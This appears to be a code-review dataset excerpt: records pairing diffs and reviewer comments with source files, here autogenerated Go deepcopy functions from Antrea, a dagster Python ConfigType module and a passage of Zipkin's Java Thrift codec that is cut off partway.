copying the receiver, writing into out. in must be non-nil. 
func (in *ClusterStatus) DeepCopyInto(out *ClusterStatus) { *out = *in if in.Conditions != nil { in, out := &in.Conditions, &out.Conditions *out = make([]ClusterCondition, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterStatus. func (in *ClusterStatus) DeepCopy() *ClusterStatus { if in == nil { return nil } out := new(ClusterStatus) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *EndpointsExport) DeepCopyInto(out *EndpointsExport) { *out = *in if in.Subsets != nil { in, out := &in.Subsets, &out.Subsets *out = make([]v1.EndpointSubset, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new EndpointsExport. func (in *EndpointsExport) DeepCopy() *EndpointsExport { if in == nil { return nil } out := new(EndpointsExport) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *EndpointsImport) DeepCopyInto(out *EndpointsImport) { *out = *in if in.Subsets != nil { in, out := &in.Subsets, &out.Subsets *out = make([]v1.EndpointSubset, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new EndpointsImport. func (in *EndpointsImport) DeepCopy() *EndpointsImport { if in == nil { return nil } out := new(EndpointsImport) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ExternalEntityExport) DeepCopyInto(out *ExternalEntityExport) { *out = *in in.ExternalEntitySpec.DeepCopyInto(&out.ExternalEntitySpec) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ExternalEntityExport. func (in *ExternalEntityExport) DeepCopy() *ExternalEntityExport { if in == nil { return nil } out := new(ExternalEntityExport) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ExternalEntityImport) DeepCopyInto(out *ExternalEntityImport) { *out = *in if in.ExternalEntitySpec != nil { in, out := &in.ExternalEntitySpec, &out.ExternalEntitySpec *out = new(v1alpha2.ExternalEntitySpec) (*in).DeepCopyInto(*out) } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ExternalEntityImport. func (in *ExternalEntityImport) DeepCopy() *ExternalEntityImport { if in == nil { return nil } out := new(ExternalEntityImport) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *MemberCluster) DeepCopyInto(out *MemberCluster) { *out = *in } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new MemberCluster. func (in *MemberCluster) DeepCopy() *MemberCluster { if in == nil { return nil } out := new(MemberCluster) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. 
func (in *MemberClusterAnnounce) DeepCopyInto(out *MemberClusterAnnounce) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new MemberClusterAnnounce. func (in *MemberClusterAnnounce) DeepCopy() *MemberClusterAnnounce { if in == nil { return nil } out := new(MemberClusterAnnounce) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *MemberClusterAnnounce) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *MemberClusterAnnounceList) DeepCopyInto(out *MemberClusterAnnounceList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]MemberClusterAnnounce, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new MemberClusterAnnounceList. func (in *MemberClusterAnnounceList) DeepCopy() *MemberClusterAnnounceList { if in == nil { return nil } out := new(MemberClusterAnnounceList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *MemberClusterAnnounceList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *RawResourceExport) DeepCopyInto(out *RawResourceExport) { *out = *in if in.Data != nil { in, out := &in.Data, &out.Data *out = make([]byte, len(*in)) copy(*out, *in) } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new RawResourceExport. func (in *RawResourceExport) DeepCopy() *RawResourceExport { if in == nil { return nil } out := new(RawResourceExport) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *RawResourceImport) DeepCopyInto(out *RawResourceImport) { *out = *in if in.Data != nil { in, out := &in.Data, &out.Data *out = make([]byte, len(*in)) copy(*out, *in) } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new RawResourceImport. func (in *RawResourceImport) DeepCopy() *RawResourceImport { if in == nil { return nil } out := new(RawResourceImport) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExport) DeepCopyInto(out *ResourceExport) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) in.Spec.DeepCopyInto(&out.Spec) in.Status.DeepCopyInto(&out.Status) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExport. func (in *ResourceExport) DeepCopy() *ResourceExport { if in == nil { return nil } out := new(ResourceExport) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. 
func (in *ResourceExport) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExportCondition) DeepCopyInto(out *ResourceExportCondition) { *out = *in in.LastTransitionTime.DeepCopyInto(&out.LastTransitionTime) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExportCondition. func (in *ResourceExportCondition) DeepCopy() *ResourceExportCondition { if in == nil { return nil } out := new(ResourceExportCondition) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExportFilter) DeepCopyInto(out *ResourceExportFilter) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) out.Spec = in.Spec out.Status = in.Status } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExportFilter. func (in *ResourceExportFilter) DeepCopy() *ResourceExportFilter { if in == nil { return nil } out := new(ResourceExportFilter) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ResourceExportFilter) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExportFilterList) DeepCopyInto(out *ResourceExportFilterList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]ResourceExportFilter, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExportFilterList. func (in *ResourceExportFilterList) DeepCopy() *ResourceExportFilterList { if in == nil { return nil } out := new(ResourceExportFilterList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ResourceExportFilterList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExportFilterSpec) DeepCopyInto(out *ResourceExportFilterSpec) { *out = *in } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExportFilterSpec. func (in *ResourceExportFilterSpec) DeepCopy() *ResourceExportFilterSpec { if in == nil { return nil } out := new(ResourceExportFilterSpec) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExportFilterStatus) DeepCopyInto(out *ResourceExportFilterStatus) { *out = *in } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExportFilterStatus. 
func (in *ResourceExportFilterStatus) DeepCopy() *ResourceExportFilterStatus { if in == nil { return nil } out := new(ResourceExportFilterStatus) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExportList) DeepCopyInto(out *ResourceExportList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]ResourceExport, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExportList. func (in *ResourceExportList) DeepCopy() *ResourceExportList { if in == nil { return nil } out := new(ResourceExportList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ResourceExportList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExportSpec) DeepCopyInto(out *ResourceExportSpec) { *out = *in if in.Service != nil { in, out := &in.Service, &out.Service *out = new(ServiceExport) (*in).DeepCopyInto(*out) } if in.Endpoints != nil { in, out := &in.Endpoints, &out.Endpoints *out = new(EndpointsExport) (*in).DeepCopyInto(*out) } if in.ExternalEntity != nil { in, out := &in.ExternalEntity, &out.ExternalEntity *out = new(ExternalEntityExport) (*in).DeepCopyInto(*out) } in.Raw.DeepCopyInto(&out.Raw) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExportSpec. func (in *ResourceExportSpec) DeepCopy() *ResourceExportSpec { if in == nil { return nil } out := new(ResourceExportSpec) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceExportStatus) DeepCopyInto(out *ResourceExportStatus) { *out = *in if in.Conditions != nil { in, out := &in.Conditions, &out.Conditions *out = make([]ResourceExportCondition, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceExportStatus. func (in *ResourceExportStatus) DeepCopy() *ResourceExportStatus { if in == nil { return nil } out := new(ResourceExportStatus) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImport) DeepCopyInto(out *ResourceImport) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) in.Spec.DeepCopyInto(&out.Spec) in.Status.DeepCopyInto(&out.Status) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImport. func (in *ResourceImport) DeepCopy() *ResourceImport { if in == nil { return nil } out := new(ResourceImport) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ResourceImport) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. 
func (in *ResourceImportClusterStatus) DeepCopyInto(out *ResourceImportClusterStatus) { *out = *in if in.Conditions != nil { in, out := &in.Conditions, &out.Conditions *out = make([]ResourceImportCondition, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportClusterStatus. func (in *ResourceImportClusterStatus) DeepCopy() *ResourceImportClusterStatus { if in == nil { return nil } out := new(ResourceImportClusterStatus) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImportCondition) DeepCopyInto(out *ResourceImportCondition) { *out = *in in.LastTransitionTime.DeepCopyInto(&out.LastTransitionTime) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportCondition. func (in *ResourceImportCondition) DeepCopy() *ResourceImportCondition { if in == nil { return nil } out := new(ResourceImportCondition) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImportFilter) DeepCopyInto(out *ResourceImportFilter) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) out.Spec = in.Spec out.Status = in.Status } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportFilter. func (in *ResourceImportFilter) DeepCopy() *ResourceImportFilter { if in == nil { return nil } out := new(ResourceImportFilter) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ResourceImportFilter) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImportFilterList) DeepCopyInto(out *ResourceImportFilterList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]ResourceImportFilter, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportFilterList. func (in *ResourceImportFilterList) DeepCopy() *ResourceImportFilterList { if in == nil { return nil } out := new(ResourceImportFilterList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ResourceImportFilterList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImportFilterSpec) DeepCopyInto(out *ResourceImportFilterSpec) { *out = *in } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportFilterSpec. func (in *ResourceImportFilterSpec) DeepCopy() *ResourceImportFilterSpec { if in == nil { return nil } out := new(ResourceImportFilterSpec) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. 
func (in *ResourceImportFilterStatus) DeepCopyInto(out *ResourceImportFilterStatus) { *out = *in } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportFilterStatus. func (in *ResourceImportFilterStatus) DeepCopy() *ResourceImportFilterStatus { if in == nil { return nil } out := new(ResourceImportFilterStatus) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImportList) DeepCopyInto(out *ResourceImportList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]ResourceImport, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportList. func (in *ResourceImportList) DeepCopy() *ResourceImportList { if in == nil { return nil } out := new(ResourceImportList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ResourceImportList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImportSpec) DeepCopyInto(out *ResourceImportSpec) { *out = *in if in.ClusterIDs != nil { in, out := &in.ClusterIDs, &out.ClusterIDs *out = make([]string, len(*in)) copy(*out, *in) } if in.ServiceImport != nil { in, out := &in.ServiceImport, &out.ServiceImport *out = new(apisv1alpha1.ServiceImport) (*in).DeepCopyInto(*out) } if in.Endpoints != nil { in, out := &in.Endpoints, &out.Endpoints *out = new(EndpointsImport) (*in).DeepCopyInto(*out) } if in.ExternalEntity != nil { in, out := &in.ExternalEntity, &out.ExternalEntity *out = new(ExternalEntityImport) (*in).DeepCopyInto(*out) } if in.Raw != nil { in, out := &in.Raw, &out.Raw *out = new(RawResourceImport) (*in).DeepCopyInto(*out) } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportSpec. func (in *ResourceImportSpec) DeepCopy() *ResourceImportSpec { if in == nil { return nil } out := new(ResourceImportSpec) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ResourceImportStatus) DeepCopyInto(out *ResourceImportStatus) { *out = *in if in.ClusterStatuses != nil { in, out := &in.ClusterStatuses, &out.ClusterStatuses *out = make([]ResourceImportClusterStatus, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceImportStatus. func (in *ResourceImportStatus) DeepCopy() *ResourceImportStatus { if in == nil { return nil } out := new(ResourceImportStatus) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ServiceExport) DeepCopyInto(out *ServiceExport) { *out = *in in.ServiceSpec.DeepCopyInto(&out.ServiceSpec) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ServiceExport. func (in *ServiceExport) DeepCopy() *ServiceExport { if in == nil { return nil } out := new(ServiceExport) in.DeepCopyInto(out) return out }
1
46,159
why is this needed?
antrea-io-antrea
go
@@ -23,7 +23,7 @@ DEFAULT_TYPE_ATTRIBUTES = ConfigTypeAttributes()
 class ConfigType(object):
-    def __init__(self, name=None, type_attributes=DEFAULT_TYPE_ATTRIBUTES, description=None):
+    def __init__(self, key, name, type_attributes=DEFAULT_TYPE_ATTRIBUTES, description=None):
         type_obj = type(self)
         if type_obj in ConfigType.__cache:
1
from collections import namedtuple import six from dagster import check from .builtin_enum import BuiltinEnum class ConfigTypeAttributes( namedtuple('_ConfigTypeAttributes', 'is_builtin is_system_config is_named') ): def __new__(cls, is_builtin=False, is_system_config=False, is_named=True): return super(ConfigTypeAttributes, cls).__new__( cls, is_builtin=check.bool_param(is_builtin, 'is_builtin'), is_system_config=check.bool_param(is_system_config, 'is_system_config'), is_named=check.bool_param(is_named, 'is_named'), ) DEFAULT_TYPE_ATTRIBUTES = ConfigTypeAttributes() class ConfigType(object): def __init__(self, name=None, type_attributes=DEFAULT_TYPE_ATTRIBUTES, description=None): type_obj = type(self) if type_obj in ConfigType.__cache: check.failed( ( '{type_obj} already in cache. You **must** use the inst() class method ' 'to construct ConfigTypes and not the ctor'.format(type_obj=type_obj) ) ) self.name = check.opt_str_param(name, 'name', type(self).__name__) self.description = check.opt_str_param(description, 'description') self.type_attributes = check.inst_param( type_attributes, 'type_attributes', ConfigTypeAttributes ) __cache = {} @classmethod def inst(cls): if cls not in ConfigType.__cache: ConfigType.__cache[cls] = cls() return ConfigType.__cache[cls] @staticmethod def from_builtin_enum(builtin_enum): check.inst_param(builtin_enum, 'builtin_enum', BuiltinEnum) return _CONFIG_MAP[builtin_enum] @property def is_system_config(self): return self.type_attributes.is_system_config @property def is_builtin(self): return self.type_attributes.is_builtin @property def is_named(self): return self.type_attributes.is_named @property def has_fields(self): return self.is_composite or self.is_selector @property def is_scalar(self): return False @property def is_list(self): return False @property def is_nullable(self): return False @property def is_composite(self): return False @property def is_selector(self): return False @property def is_any(self): return False @property def inner_types(self): return [] @property def is_enum(self): return False # Scalars, Composites, Selectors, Lists, Nullable, Any class ConfigScalar(ConfigType): @property def is_scalar(self): return True def is_config_scalar_valid(self, _config_value): check.not_implemented('must implement') class ConfigList(ConfigType): def __init__(self, inner_type, *args, **kwargs): self.inner_type = check.inst_param(inner_type, 'inner_type', ConfigType) super(ConfigList, self).__init__(*args, **kwargs) def is_list(self): return True @property def inner_types(self): return [self.inner_type] + self.inner_type.inner_types class ConfigNullable(ConfigType): def __init__(self, inner_type, *args, **kwargs): self.inner_type = check.inst_param(inner_type, 'inner_type', ConfigType) super(ConfigNullable, self).__init__(*args, **kwargs) @property def is_nullable(self): return True @property def inner_types(self): return [self.inner_type] + self.inner_type.inner_types class ConfigAny(ConfigType): @property def is_any(self): return True class BuiltinConfigScalar(ConfigScalar): def __init__(self, name=None, description=None): super(BuiltinConfigScalar, self).__init__( name=name, description=description, type_attributes=ConfigTypeAttributes(is_builtin=True), ) class Int(BuiltinConfigScalar): def __init__(self): super(Int, self).__init__(description='') def is_config_scalar_valid(self, config_value): return not isinstance(config_value, bool) and isinstance(config_value, six.integer_types) class _StringishBuiltin(BuiltinConfigScalar): def 
is_config_scalar_valid(self, config_value): return isinstance(config_value, six.string_types) class String(_StringishBuiltin): def __init__(self): super(String, self).__init__(description='') class Path(_StringishBuiltin): def __init__(self): super(Path, self).__init__(description='') class Bool(BuiltinConfigScalar): def __init__(self): super(Bool, self).__init__(description='') def is_config_scalar_valid(self, config_value): return isinstance(config_value, bool) class Float(BuiltinConfigScalar): def __init__(self): super(Float, self).__init__(description='') def is_config_scalar_valid(self, config_value): return isinstance(config_value, float) class Any(ConfigAny): def __init__(self): super(Any, self).__init__(type_attributes=ConfigTypeAttributes(is_builtin=True)) def Nullable(inner_type): check.inst_param(inner_type, 'inner_type', ConfigType) class _Nullable(ConfigNullable): def __init__(self): super(_Nullable, self).__init__( name='Nullable.{inner_type}'.format(inner_type=inner_type.name), type_attributes=ConfigTypeAttributes(is_builtin=True, is_named=False), inner_type=inner_type, ) return _Nullable def List(inner_type): check.inst_param(inner_type, 'inner_type', ConfigType) class _List(ConfigList): def __init__(self): super(_List, self).__init__( name='List.{inner_type}'.format(inner_type=inner_type.name), description='List of {inner_type}'.format(inner_type=inner_type.name), type_attributes=ConfigTypeAttributes(is_builtin=True, is_named=False), inner_type=inner_type, ) return _List class EnumValue: def __init__(self, config_value, python_value=None, description=None): self.config_value = check.str_param(config_value, 'config_value') self.python_value = config_value if python_value is None else python_value self.description = check.opt_str_param(description, 'description') class ConfigEnum(ConfigType): def __init__(self, name, enum_values): super(ConfigEnum, self).__init__(name=check.str_param(name, 'name')) self.enum_values = check.list_param(enum_values, 'enum_values', of_type=EnumValue) self._valid_python_values = {ev.python_value for ev in enum_values} check.invariant(len(self._valid_python_values) == len(enum_values)) self._valid_config_values = {ev.config_value for ev in enum_values} check.invariant(len(self._valid_config_values) == len(enum_values)) @property def config_values(self): return [ev.config_value for ev in self.enum_values] @property def is_enum(self): return True def is_valid_config_enum_value(self, config_value): return config_value in self._valid_config_values def to_python_value(self, config_value): for ev in self.enum_values: if ev.config_value == config_value: return ev.python_value check.failed('should never reach this. config_value should be pre-validated') def Enum(name, enum_values): class _EnumType(ConfigEnum): def __init__(self): super(_EnumType, self).__init__(name=name, enum_values=enum_values) return _EnumType _CONFIG_MAP = { BuiltinEnum.ANY: Any.inst(), BuiltinEnum.BOOL: Bool.inst(), BuiltinEnum.FLOAT: Float.inst(), BuiltinEnum.INT: Int.inst(), BuiltinEnum.PATH: Path.inst(), BuiltinEnum.STRING: String.inst(), }
1
12,227
I wonder if it'd be possible to autogenerate a key from the name within this function if one is not provided explicitly, rather than having all the callsites pass both the name and key (and usually as the same value)? Might give us a good place to implement a `name->key` function that isn't 1:1.
dagster-io-dagster
py
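The review comment in the dagster record above suggests deriving `key` from `name` inside `ConfigType.__init__` when no key is passed explicitly, instead of making every call site pass both values. The following is a minimal standalone Python sketch of that idea only; it is not dagster's actual implementation, and the `_key_from_name` helper and its normalization rule are hypothetical, chosen merely to illustrate a name-to-key mapping that is not 1:1.

import re

def _key_from_name(name):
    # Hypothetical normalization rule: replace characters that are awkward in a
    # key (for example '.') with '_'; two different names can map to one key,
    # which is exactly why the mapping need not be 1:1.
    return re.sub(r'[^A-Za-z0-9_]', '_', name)

class ConfigTypeSketch(object):
    def __init__(self, name, key=None, description=None):
        self.name = name
        # Only call sites that need a key different from the name pass `key`;
        # everyone else falls back to the derived value.
        self.key = key if key is not None else _key_from_name(name)
        self.description = description

if __name__ == '__main__':
    print(ConfigTypeSketch(name='List.String').key)  # List_String
    print(ConfigTypeSketch(name='List_String').key)  # List_String (collision: mapping is not 1:1)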
@@ -110,6 +110,7 @@ public final class ThriftCodec implements Codec {
     final Field IPV4 = new Field(TYPE_I32, 1);
     final Field PORT = new Field(TYPE_I16, 2);
     final Field SERVICE_NAME = new Field(TYPE_STRING, 3);
+    final Field IPV6 = new Field(TYPE_STRING, 4);
     @Override
     public Endpoint read(ByteBuffer bytes) {
1
/** * Copyright 2015-2016 The OpenZipkin Authors * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except * in compliance with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ package zipkin.internal; import java.io.EOFException; import java.nio.BufferUnderflowException; import java.nio.ByteBuffer; import java.util.ArrayList; import java.util.Collections; import java.util.List; import okio.Buffer; import zipkin.Annotation; import zipkin.BinaryAnnotation; import zipkin.Codec; import zipkin.DependencyLink; import zipkin.Endpoint; import zipkin.Span; import static zipkin.internal.Util.UTF_8; import static zipkin.internal.Util.checkArgument; /** * This is a hard-coded thrift codec, which allows us to include thrift marshalling in a minified * core jar. The hard coding not only keeps us with a single data-model, it also allows the minified * core jar free of SLFJ classes otherwise included in generated types. * * <p> This directly implements TBinaryProtocol so as to reduce dependencies and array duplication. * While reads internally use {@link ByteBuffer}, writes use {@link Buffer} as the latter can grow. */ public final class ThriftCodec implements Codec { // break vs decode huge structs, like > 1MB strings or 10k spans in a trace. static final int STRING_LENGTH_LIMIT = 1 * 1024 * 1024; static final int CONTAINER_LENGTH_LIMIT = 10 * 1000; // break vs recursing infinitely when skipping data private static int MAX_SKIP_DEPTH = 2147483647; // taken from org.apache.thrift.protocol.TType static final byte TYPE_STOP = 0; static final byte TYPE_BOOL = 2; static final byte TYPE_BYTE = 3; static final byte TYPE_DOUBLE = 4; static final byte TYPE_I16 = 6; static final byte TYPE_I32 = 8; static final byte TYPE_I64 = 10; static final byte TYPE_STRING = 11; static final byte TYPE_STRUCT = 12; static final byte TYPE_MAP = 13; static final byte TYPE_SET = 14; static final byte TYPE_LIST = 15; /** * Added for DataStax Cassandra driver, which returns data in ByteBuffers. The implementation * takes care not to re-buffer the data. 
* * @throws {@linkplain IllegalArgumentException} if the span couldn't be decoded */ public Span readSpan(ByteBuffer bytes) { return read(SPAN_ADAPTER, bytes); } @Override public Span readSpan(byte[] bytes) { return read(SPAN_ADAPTER, ByteBuffer.wrap(bytes)); } @Override public byte[] writeSpan(Span value) { return write(SPAN_ADAPTER, value); } @Override public List<Span> readSpans(byte[] bytes) { return read(SPANS_ADAPTER, ByteBuffer.wrap(bytes)); } @Override public byte[] writeSpans(List<Span> value) { return write(SPANS_ADAPTER, value); } @Override public byte[] writeTraces(List<List<Span>> value) { return write(TRACES_ADAPTER, value); } interface ThriftWriter<T> { void write(T value, Buffer buffer); } interface ThriftReader<T> { T read(ByteBuffer bytes); } interface ThriftAdapter<T> extends ThriftReader<T>, ThriftWriter<T> { } static final ThriftAdapter<Endpoint> ENDPOINT_ADAPTER = new ThriftAdapter<Endpoint>() { final Field IPV4 = new Field(TYPE_I32, 1); final Field PORT = new Field(TYPE_I16, 2); final Field SERVICE_NAME = new Field(TYPE_STRING, 3); @Override public Endpoint read(ByteBuffer bytes) { Endpoint.Builder result = Endpoint.builder(); Field field; while (true) { field = Field.read(bytes); if (field.type == TYPE_STOP) break; if (field.isEqualTo(IPV4)) { result.ipv4(bytes.getInt()); } else if (field.isEqualTo(PORT)) { result.port(bytes.getShort()); } else if (field.isEqualTo(SERVICE_NAME)) { result.serviceName(readUtf8(bytes)); } else { skip(bytes, field.type); } } return result.build(); } @Override public void write(Endpoint value, Buffer buffer) { IPV4.write(buffer); buffer.writeInt(value.ipv4); PORT.write(buffer); buffer.writeShort(value.port == null ? 0 : value.port); SERVICE_NAME.write(buffer); writeUtf8(buffer, value.serviceName); buffer.writeByte(TYPE_STOP); } }; static final ThriftAdapter<Annotation> ANNOTATION_ADAPTER = new ThriftAdapter<Annotation>() { final Field TIMESTAMP = new Field(TYPE_I64, 1); final Field VALUE = new Field(TYPE_STRING, 2); final Field ENDPOINT = new Field(TYPE_STRUCT, 3); @Override public Annotation read(ByteBuffer bytes) { Annotation.Builder result = Annotation.builder(); Field field; while (true) { field = Field.read(bytes); if (field.type == TYPE_STOP) break; if (field.isEqualTo(TIMESTAMP)) { result.timestamp(bytes.getLong()); } else if (field.isEqualTo(VALUE)) { result.value(readUtf8(bytes)); } else if (field.isEqualTo(ENDPOINT)) { 